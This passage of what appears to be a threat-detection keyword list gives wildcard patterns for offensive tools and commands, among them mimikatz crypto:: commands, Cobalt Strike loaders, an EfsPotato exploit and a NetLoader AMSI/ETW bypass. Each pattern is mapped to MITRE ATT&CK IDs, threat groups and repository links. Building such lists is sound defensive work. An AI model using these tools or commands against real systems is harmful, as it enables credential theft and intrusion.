- TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::certificates*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::certtohw*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::cng*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::extract*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::hash*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::keys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::providers*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::sc*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::scauth*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::stores*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::system*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto::tpminfo*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*crypto_identifier*,offensive_tool_keyword,crypto_identifier,Crypto tool for pentest and ctf : try to uncipher data using multiple algorithms and block chaining modes. Usefull for a quick check on unknown cipher text and key dictionary,T1573 - T1558 - T1112,TA0001,N/A,N/A,Exploitation tools,https://github.com/Acceis/crypto_identifier,1,1,N/A,N/A,2,116,26,2018-01-04T11:04:56Z,2017-11-30T13:04:49Z -*cryptvortex *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*cs2modrewrite.py*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*cs2nginx.py*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*csandker/Azure-AccessPermissions*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,1,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*CS-Avoid-killing*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*CS-BOFs/lsass*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*csc.exe /t:exe /out:RandomName.exe Program.cs*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*csc.exe EfsPotato.cs *,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z -*cscript *wmi.vbs -h*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cscript ..\\temp.vbs*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*cscript dl.vbs *http*/*.zip*.zip*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,0,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*CsEnox/SeManageVolumeExploit*,offensive_tool_keyword,SeManageVolumeExploit,This exploit grants full permission on C:\ drive for all users on the machine,T1046 - T1098 - T1222.002,TA0007 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/CsEnox/SeManageVolumeExploit,1,1,N/A,10,1,44,13,2023-05-29T05:41:16Z,2021-10-11T01:17:04Z -*csexec/csexec_history*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*csharp_inject_bof_inject*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*CSharpNamedPipeLoader*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*csload.net/*/muma.*,offensive_tool_keyword,cobaltstrike,A cobaltstrike shellcode loader - past domestic mainstream antivirus software,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/csload.net,1,1,N/A,10,10,123,13,2021-05-21T02:36:03Z,2021-05-20T08:24:16Z -*csOnvps*teamserver*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*cSploit-*.apk*,offensive_tool_keyword,csploit,The most complete and advanced IT security professional toolkit on Android.,T1555 - T1569 - T1210,TA0002 - TA0003 - TA0009,N/A,N/A,Frameworks,https://github.com/cSploit/android,1,1,N/A,N/A,10,3108,1130,2022-09-02T00:16:04Z,2014-10-04T05:53:29Z -*cSploit/android*,offensive_tool_keyword,csploit,The most complete and advanced IT security professional toolkit on Android.,T1555 - T1569 - T1210,TA0002 - TA0003 - TA0009,N/A,N/A,Frameworks,https://github.com/cSploit/android,1,1,N/A,N/A,10,3108,1130,2022-09-02T00:16:04Z,2014-10-04T05:53:29Z -*csprecon -*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*CS-Remote-OPs-BOF*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*csrf_to_beef*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*CSSG_load.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 